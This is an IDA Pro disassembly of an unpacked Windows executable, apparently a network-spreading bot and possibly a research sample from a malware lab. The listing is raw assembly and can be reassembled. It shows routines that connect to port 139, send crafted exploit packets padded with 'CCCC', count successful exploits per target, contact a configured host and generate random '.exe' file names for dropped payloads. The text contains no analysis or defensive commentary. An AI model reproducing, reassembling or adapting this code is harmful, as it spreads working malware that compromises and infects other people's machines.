;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 3D17903825F0AA5627678C90871F91C4
; File Name : u:\work\3d17903825f0aa5627678c90871f91c4_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00279000 (2592768.)
; Section size in file : 00279000 (2592768.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
public start
start proc near ; CODE XREF: sub_40126C+E�p
; sub_40126C+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
start endp
; =============== S U B R O U T I N E =======================================
sub_40100A proc near ; CODE XREF: sub_40126C+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_4296E8
mov edi, eax
pop ecx
test edi, edi
jz short loc_40103C
push ebx
push 0
push edi
call sub_429690
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_429350
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40103C: ; CODE XREF: sub_40100A+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40100A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401044 proc near ; CODE XREF: sub_401136+18�p
; sub_4011B0+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
jz short loc_401090
push edi
push 0
push esi
call sub_429690
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_429350
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_429350
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_401090: ; CODE XREF: sub_401044+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_401044 endp
; =============== S U B R O U T I N E =======================================
sub_401099 proc near ; CODE XREF: sub_401136+5E�p
; sub_401136+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_4010A9
push eax
call sub_429822
pop ecx
loc_4010A9: ; CODE XREF: sub_401099+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_401099 endp
; =============== S U B R O U T I N E =======================================
sub_4010B2 proc near ; CODE XREF: sub_401136+20�p
; sub_401211+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4010DC
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_4296E8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4010E0
loc_4010DC: ; CODE XREF: sub_4010B2+D�j
xor al, al
jmp short loc_401132
; ---------------------------------------------------------------------------
loc_4010E0: ; CODE XREF: sub_4010B2+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_429690
add esp, 0Ch
cmp ebx, 1
jnz short loc_401100
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_401115
; ---------------------------------------------------------------------------
loc_401100: ; CODE XREF: sub_4010B2+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_401115: ; CODE XREF: sub_4010B2+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_429350
add esp, 0Ch
push dword ptr [esi]
call sub_429822
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_401132: ; CODE XREF: sub_4010B2+2C�j
pop edi
pop esi
pop ebx
retn
sub_4010B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401136 proc near ; CODE XREF: sub_40126C+89�p
; sub_40126C+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset word_454018
call sub_401044
lea ecx, [ebp+var_8]
call sub_4010B2
mov eax, [ebp+var_4]
inc eax
push eax
call sub_4296E8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_401170
xor al, al
jmp short loc_4011AC
; ---------------------------------------------------------------------------
loc_401170: ; CODE XREF: sub_401136+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_429690
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_429350
add esp, 18h
mov ecx, esi
call sub_401099
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_401099
mov al, 1
loc_4011AC: ; CODE XREF: sub_401136+38�j
pop edi
pop esi
leave
retn
sub_401136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011B0 proc near ; CODE XREF: sub_4011E4+14�p
; sub_401201+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_401044
mov ecx, esi
call sub_401099
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_4011B0 endp
; =============== S U B R O U T I N E =======================================
sub_4011E4 proc near ; CODE XREF: sub_40126C+F0�p
; sub_40126C+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_4292D0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_4011B0
pop esi
retn 4
sub_4011E4 endp
; =============== S U B R O U T I N E =======================================
sub_401201 proc near ; CODE XREF: sub_40124D+B�p
; sub_40126C+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4011B0
retn 8
sub_401201 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401211 proc near ; CODE XREF: sub_40124D+16�p
; sub_40126C+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_4010B2
test al, al
jz short loc_40124A
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_43A2F8
call sub_401044
mov ecx, esi
call sub_401099
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40124A: ; CODE XREF: sub_401211+F�j
pop esi
leave
retn
sub_401211 endp
; =============== S U B R O U T I N E =======================================
sub_40124D proc near ; CODE XREF: sub_40126C+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_401201
test al, al
jz short loc_401268
mov ecx, esi
call sub_401211
loc_401268: ; CODE XREF: sub_40124D+12�j
pop esi
retn 8
sub_40124D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40126C proc near ; CODE XREF: .text:00401821�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call start
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_4015B0
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_4015B0
push esi
lea ecx, [ebp+var_30]
call start
lea ecx, [ebp+var_20]
call start
lea ecx, [ebp+var_50]
call start
lea ecx, [ebp+var_18]
call start
lea ecx, [ebp+var_40]
call start
lea ecx, [ebp+var_38]
call start
lea ecx, [ebp+var_28]
call start
push 4
push offset dword_43A05C
lea ecx, [ebp+var_30]
call sub_4011B0
push 3
push offset dword_43A064
lea ecx, [ebp+var_30]
call sub_4011B0
lea ecx, [ebp+var_30]
call sub_401136
lea ecx, [ebp+var_30]
call sub_401211
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_429690
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset byte_43A050
call sub_4011B0
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_4011B0
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_4011B0
lea ecx, [ebp+var_20]
call sub_401136
push offset loc_43A320
lea ecx, [ebp+var_50]
call sub_4011E4
lea ecx, [ebp+var_50]
call sub_401136
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_40100A
lea ecx, [ebp+var_58]
call sub_401136
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40124D
lea ecx, [ebp+var_58]
call sub_401099
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_429690
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_4011E4
push 4
push offset dword_43A068
lea ecx, [ebp+var_18]
call sub_4011B0
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_4011B0
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_4011B0
lea ecx, [ebp+var_18]
call sub_401136
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_401201
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_401201
lea ecx, [ebp+var_40]
call sub_401211
lea ecx, [ebp+var_18]
call sub_401099
lea ecx, [ebp+var_50]
call sub_401099
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_401201
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_401201
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_401201
lea ecx, [ebp+var_38]
call sub_401211
lea ecx, [ebp+var_20]
call sub_401099
lea ecx, [ebp+var_30]
call sub_401099
lea ecx, [ebp+var_40]
call sub_401099
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_4011B0
lea ecx, [ebp+var_28]
call sub_401136
push 2
push offset dword_43A314
lea ecx, [ebp+var_28]
call sub_4011B0
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_401201
lea ecx, [ebp+var_28]
call sub_401211
lea ecx, [ebp+var_38]
call sub_401099
lea ecx, [ebp+var_10]
call start
lea ecx, [ebp+var_8]
call start
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_401201
lea ecx, [ebp+var_10]
call sub_4010B2
lea ecx, [ebp+var_28]
call sub_401099
push offset dword_43A310
lea ecx, [ebp+var_8]
call sub_4011E4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_401201
lea ecx, [ebp+var_8]
call sub_4010B2
lea ecx, [ebp+var_10]
call sub_401099
push offset dword_43A30C
lea ecx, [ebp+var_10]
call sub_4011E4
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_401201
lea ecx, [ebp+var_10]
call sub_4010B2
lea ecx, [ebp+var_8]
call sub_401099
push offset dword_43A300
lea ecx, [ebp+var_8]
call sub_4011E4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_401201
lea ecx, [ebp+var_8]
call sub_4010B2
lea ecx, [ebp+var_10]
call sub_401099
push offset dword_43A2FC
lea ecx, [ebp+var_48]
call sub_4011E4
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_401201
lea ecx, [ebp+var_8]
call sub_401099
pop esi
loc_4015B0: ; CODE XREF: sub_40126C+1B�j
; sub_40126C+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_40126C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015C2 proc near ; CODE XREF: sub_401687+A2�p
; sub_401687+C7�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
xor edi, edi
push eax
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_456EFC ; select
cmp eax, edi
jnz short loc_40162A
lea eax, [ebp+var_10C]
push eax
push esi
call dword_456DB8 ; __WSAFDIsSet
test eax, eax
jnz short loc_40162E
loc_40162A: ; CODE XREF: sub_4015C2+54�j
xor eax, eax
jmp short loc_40163E
; ---------------------------------------------------------------------------
loc_40162E: ; CODE XREF: sub_4015C2+66�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_456F38 ; recv
loc_40163E: ; CODE XREF: sub_4015C2+6A�j
pop edi
pop esi
leave
retn
sub_4015C2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401642 proc near ; CODE XREF: sub_401687+80�p
; sub_401687+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_456F14 ; ntohl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_456F6C ; send
cmp eax, 4
jz short loc_40166C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40166C: ; CODE XREF: sub_401642+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456F6C ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_401642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401687 proc near ; CODE XREF: sub_401766+48�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4016B0
xor al, al
jmp loc_401761
; ---------------------------------------------------------------------------
loc_4016B0: ; CODE XREF: sub_401687+20�j
push ebx
push 0
push esi
call sub_429690
push 2Fh
push offset dword_43A0F8
push esi
call sub_429350
push 8
lea eax, [esi+31h]
push offset dword_43A128
push eax
mov [esi+2Fh], di
call sub_429350
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_429350
push 6
add ebx, edi
push offset dword_454010
push ebx
call sub_429350
push 85h
push offset dword_43A070
push [ebp+arg_0]
call sub_401642
add esp, 48h
test al, al
jnz short loc_401717
loc_401713: ; CODE XREF: sub_401687+B8�j
xor bl, bl
jmp short loc_401758
; ---------------------------------------------------------------------------
loc_401717: ; CODE XREF: sub_401687+8A�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_4015C2
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_401642
add esp, 1Ch
test al, al
jz short loc_401713
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_4015C2
add esp, 10h
mov bl, 1
loc_401758: ; CODE XREF: sub_401687+8E�j
push esi
call sub_429822
pop ecx
mov al, bl
loc_401761: ; CODE XREF: sub_401687+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_401687 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401766 proc near ; CODE XREF: .text:0040189A�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_43A138
push [ebp+arg_0]
call dword_456F6C ; send
cmp eax, 48h
jnz short loc_4017A1
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_4015C2
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_4017A1
cmp [ebp+var_20], 82h
jz short loc_4017A5
loc_4017A1: ; CODE XREF: sub_401766+1B�j
; sub_401766+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4017A5: ; CODE XREF: sub_401766+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_401687
add esp, 0Ch
leave
retn
sub_401766 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 41Ch
and byte ptr [ebp-41Ch], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Bh]
push 7
rep stosd
stosw
stosb
lea eax, [ebp-41Ch]
push offset dword_43A2F0
push eax
call sub_429350
push dword_43A184
lea eax, [ebp-41Ch]
push offset dword_43A8E8
push eax
call sub_429350
lea eax, [ebp-41Ch]
push 400h
push eax
push 164h
lea eax, [ebp-0Ch]
push offset sub_43A188
push eax
call sub_40126C
xor ebx, ebx
add esp, 2Ch
cmp [ebp-8], ebx
jnz short loc_401837
xor eax, eax
jmp loc_40198B
; ---------------------------------------------------------------------------
loc_401837: ; CODE XREF: .text:0040182E�j
mov [ebp-4], ebx
loc_40183A: ; CODE XREF: .text:004018C2�j
test ebx, ebx
jnz loc_4018C8
push 6
push 1
push 2
call dword_456FB0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4018B0
xor eax, eax
lea edi, [ebp-1Ah]
stosd
stosd
stosd
stosw
push 8Bh
mov word ptr [ebp-1Ch], 2
call dword_456F18 ; ntohs
mov [ebp-1Ah], ax
lea eax, [ebp+10h]
push eax
call dword_456F5C ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz short loc_4018A5
push dword ptr [ebp-8]
push dword ptr [ebp-0Ch]
push esi
call sub_401766
add esp, 0Ch
movzx ebx, al
loc_4018A5: ; CODE XREF: .text:00401891�j
push esi
call dword_456FD0 ; closesocket
test ebx, ebx
jnz short loc_4018BB
loc_4018B0: ; CODE XREF: .text:00401853�j
push 3E8h
call dword_43718C ; Sleep
loc_4018BB: ; CODE XREF: .text:004018AE�j
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 2
jl loc_40183A
loc_4018C8: ; CODE XREF: .text:0040183C�j
lea ecx, [ebp-0Ch]
call sub_401099
test ebx, ebx
jz loc_40197E
movzx eax, word_443986
push eax
lea esi, [ebp+10h]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_40197E
mov edx, [ebp+0BCh]
xor ebx, ebx
mov eax, edx
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
shl eax, 6
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+0CCh], ebx
mov ecx, [ecx]
jz short loc_401952
cmp [ebp+0C4h], ebx
jnz short loc_40195A
push ecx
lea ecx, [ebp+10h]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD84
mov edx, [ebp+0BCh]
add esp, 1Ch
loc_401952: ; CODE XREF: .text:00401926�j
cmp [ebp+0C4h], ebx
jz short loc_40197E
loc_40195A: ; CODE XREF: .text:0040192E�j
shl edx, 6
lea eax, [ebp+10h]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CD0E
add esp, 1Ch
loc_40197E: ; CODE XREF: .text:004018D2�j
; .text:004018FD�j ...
lea eax, [ebp+10h]
push eax
call sub_401E8E
xor eax, eax
pop ecx
inc eax
loc_40198B: ; CODE XREF: .text:00401832�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401990 proc near ; CODE XREF: sub_40A938+5DEE�p
var_4E20 = byte ptr -4E20h
var_2710 = byte ptr -2710h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 4E20h
call sub_429A90
push ebx
push edi
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_2710]
push offset aSStats ; "%s (Stats):"
push eax
xor ebx, ebx
call sub_429A33
add esp, 0Ch
cmp dword_43A378, ebx
mov edi, 2710h
jz short loc_401A08
push esi
mov esi, offset dword_43A380
loc_4019CD: ; CODE XREF: sub_401990+75�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-29h]
push eax
lea eax, [ebp+var_4E20]
push offset aSD_0 ; " (%s: %d),"
push eax
call sub_429A33
lea eax, [ebp+var_4E20]
push edi
push eax
lea eax, [ebp+var_2710]
push eax
call sub_429910
add esi, 40h
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_4019CD
pop esi
loc_401A08: ; CODE XREF: sub_401990+35�j
push 0
push dword_457E38
call dword_437184 ; GetTickCount
push eax
call sub_41B932
push eax
push ebx
push dword_457CE8
lea eax, [ebp+var_4E20]
push offset aEftpdDTotalDIn ; " (EFTPD): (%d), Total -> (%d in %s)"
push eax
call sub_429A33
lea eax, [ebp+var_4E20]
push edi
push eax
lea eax, [ebp+var_2710]
push eax
call sub_429910
add esp, 2Ch
cmp ebx, [ebp+arg_10]
lea eax, [ebp+var_2710]
pop edi
pop ebx
push eax
push [ebp+arg_4]
push [ebp+arg_0]
jg short loc_401A66
cmp [ebp+arg_8], 0
jnz short loc_401A6D
loc_401A66: ; CODE XREF: sub_401990+CE�j
call sub_41CD84
jmp short loc_401A72
; ---------------------------------------------------------------------------
loc_401A6D: ; CODE XREF: sub_401990+D4�j
call sub_41CD0E
loc_401A72: ; CODE XREF: sub_401990+DB�j
add esp, 0Ch
leave
retn
sub_401990 endp
; =============== S U B R O U T I N E =======================================
sub_401A77 proc near ; CODE XREF: sub_401B6E+1B4�p
; sub_401B6E+1BA�p ...
push esi
push edi
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
push 1Ah
pop edi
cdq
mov ecx, edi
push 61h
idiv ecx
pop esi
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
idiv edi
add edx, esi
mov esi, offset dword_454744
push edx
push offset aCCCCCC ; "%c%c%c%c%c%c"
push esi
call sub_429A33
add esp, 20h
mov eax, esi
pop edi
pop esi
retn
sub_401A77 endp
; =============== S U B R O U T I N E =======================================
sub_401AF0 proc near ; CODE XREF: sub_401B6E+17F�p
; sub_401B6E+18A�p ...
push esi
push edi
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
push 1Ah
pop edi
cdq
mov ecx, edi
push 61h
idiv ecx
pop esi
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
add edx, esi
push edx
call sub_429ACC
cdq
idiv edi
add edx, esi
mov esi, offset dword_454720
push edx
push offset dword_44399C
push offset aSCCCCC ; "%s%c%c%c%c%c"
push esi
call sub_429A33
add esp, 24h
mov eax, esi
pop edi
pop esi
retn
sub_401AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B6E proc near ; CODE XREF: .text:004018F0�p
; sub_403B6C+139�p ...
var_6B0 = byte ptr -6B0h
var_2B0 = byte ptr -2B0h
var_1B0 = byte ptr -1B0h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 6B0h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_429690
add esp, 0Ch
cmp dword_456D88, edi
push 2
pop ebx
jz short loc_401BFC
push 10h
lea eax, [ebp+var_20]
push edi
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_20], bx
push offset dword_456580
call dword_456F5C ; inet_addr
mov [ebp+var_1C], eax
mov ax, word ptr dword_456780
push eax
call dword_456F18 ; ntohs
push edi
push 1
push ebx
mov [ebp+var_1E], ax
call dword_456FB0 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_401E67
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401BF5
mov dword_456D88, edi
loc_401BF5: ; CODE XREF: sub_401B6E+7F�j
push esi
call dword_4372D4 ; closesocket
loc_401BFC: ; CODE XREF: sub_401B6E+26�j
lea eax, [ebp+arg_0]
mov [ebp+var_10], bx
push eax
call dword_456F5C ; inet_addr
push [ebp+arg_C4]
mov [ebp+var_C], eax
call dword_456F18 ; ntohs
push edi
push 1
push ebx
mov [ebp+var_E], ax
call dword_456FB0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+arg_C4], ebx
jz loc_401E67
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz loc_401E67
push edi
lea eax, [ebp+var_6B0]
push 400h
push eax
push ebx
call dword_456F38 ; recv
call sub_429ACC
push 9
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429ACC
cdq
idiv esi
lea eax, [ebp+var_2B0]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
add esp, 20h
cmp dword_456D88, edi
jnz loc_401D6F
lea eax, [ebp+arg_0]
push eax
call sub_41E3FB
test eax, eax
pop ecx
mov [ebp+arg_C4], offset dword_457CD8
jnz short loc_401CE1
mov [ebp+arg_C4], offset dword_457C20
loc_401CE1: ; CODE XREF: sub_401B6E+167�j
